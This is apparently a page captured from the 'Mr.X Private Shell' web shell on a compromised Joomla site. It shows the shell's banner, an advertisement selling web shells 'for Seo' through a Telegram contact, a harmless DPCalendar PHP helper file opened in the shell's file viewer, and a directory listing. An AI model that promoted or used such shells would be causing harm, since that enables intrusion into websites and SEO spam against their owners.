__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* @package DPCalendar
* @copyright Copyright (C) 2014 Digital Peak GmbH. <https://www.digital-peak.com>
* @license https://www.gnu.org/licenses/gpl-3.0.html GNU/GPL
*/
namespace DigitalPeak\Component\DPCalendar\Administrator\Helper;
use DigitalPeak\Component\DPCalendar\Administrator\Model\FieldsOrderModel;
use Joomla\CMS\Application\CMSApplicationInterface;
use Joomla\CMS\Factory;
use Joomla\Registry\Registry;
\defined('_JEXEC') or die();
class FieldsOrder
{
public static function getBookingFields(\stdClass $booking, Registry $params, CMSApplicationInterface $app): array
{
return self::getModel()->getBookingFields($booking, $params, $app);
}
public static function getTicketFields(\stdClass $ticket, Registry $params, CMSApplicationInterface $app): array
{
return self::getModel()->getTicketFields($ticket, $params, $app);
}
private static function getModel(): FieldsOrderModel
{
return Factory::getApplication()->bootComponent('dpcalendar')->getMVCFactory()->createModel('FieldsOrder', 'Administrator');
}
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| Booking.php | File | 15.37 KB | 0664 |
|
| DPCalendarHelper.php | File | 52.61 KB | 0664 |
|
| DateHelper.php | File | 6.57 KB | 0664 |
|
| ExportTrait.php | File | 9.45 KB | 0664 |
|
| FieldsOrder.php | File | 1.03 KB | 0664 |
|
| Location.php | File | 1.77 KB | 0664 |
|